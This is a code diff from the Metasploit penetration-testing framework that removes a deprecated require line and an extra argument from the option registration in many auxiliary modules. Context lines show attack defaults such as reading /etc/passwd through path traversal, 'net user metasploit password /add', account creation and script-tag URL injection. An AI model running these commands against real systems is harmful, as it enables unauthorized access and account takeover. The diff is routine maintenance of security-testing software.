end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
@ -104,7 +102,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8028),
|
||||
OptString.new("PARAM", [false, 'Specify a parameter for the action'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(3000),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'hostname']),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -32,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(3500),
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
@ -50,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(5555),
|
||||
OptString.new("CMD", [true, 'File to execute', 'Windows\System32\calc.exe'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
|
@ -42,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
Opt::RPORT(8080),
|
||||
OptString.new('USERNAME', [true, 'Username for the new account', 'msf']),
|
||||
OptString.new('PASSWORD', [true, 'Password for the new account', 'p4ssw0rd'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def get_service_desk_strong_name
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
@ -87,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"A URL to inject into a script tag in the context of the device web interface.",
|
||||
''
|
||||
])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -47,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),
|
||||
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),
|
||||
OptString.new('PATH', [ true, 'The file to read or delete', "\\windows\\win.ini" ])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'bcrypt'
|
||||
require 'digest'
|
||||
require 'openssl'
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
|
||||
OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(80),
|
||||
OptString.new('CMD', [ true, 'The command to execute', 'cat var/passwd'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RPORT(8000),
|
||||
OptString.new('CMD', [ false, "The command to execute.", "net user metasploit password /add" ]),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
OptString.new('TARGETURI', [ true, "The request URI", '/']),
|
||||
OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|